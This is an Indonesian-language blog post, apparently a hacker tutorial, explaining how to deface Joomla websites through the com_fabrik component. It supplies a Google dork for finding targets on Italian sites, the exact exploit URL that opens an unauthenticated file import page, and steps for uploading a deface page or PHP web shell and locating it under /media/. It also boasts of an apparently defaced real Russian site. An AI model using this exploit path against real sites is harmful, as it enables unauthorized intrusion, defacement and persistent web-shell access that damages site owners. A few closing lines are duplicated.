udah lama ga post, bingung mau post apaan, jadinya share trik Deface dengan com_fabrik.
yak kita mulai aja.
Dork : inurl:viewTable?cid= site:it
1. Kita pertama harus cari dulu digoogle dengan dork diatas
2. Jika udah ketemu targetnya, tambahin exploit di web target
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh :
www.target.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Lalu akan muncul begini
Kalo misalkan ga muncul cari target lain.
Kalo udah muncul begitu langsung upload shell / sc defacenya aja
kalo upload sc deface, tinggal upload trus liat hasilnya di www.target.com/media/nama file nya.html
kalo upload shell www.target.com/media/nama shell.php
Kalo langsung upload script htmlnya jadi seperti ini:
Kalo upload shell ya jadi gini:
Terserah deh mau diapain tuh,
kalo saya sih indexnya aja udah cukup :D
http://www.airussiaopen.ru/
Thx y sampe sini aja.
Terserah deh mau diapain tuh,
kalo saya sih indexnya aja udah cukup :D
Thx y sampe sini aja.
0 komentar:
Posting Komentar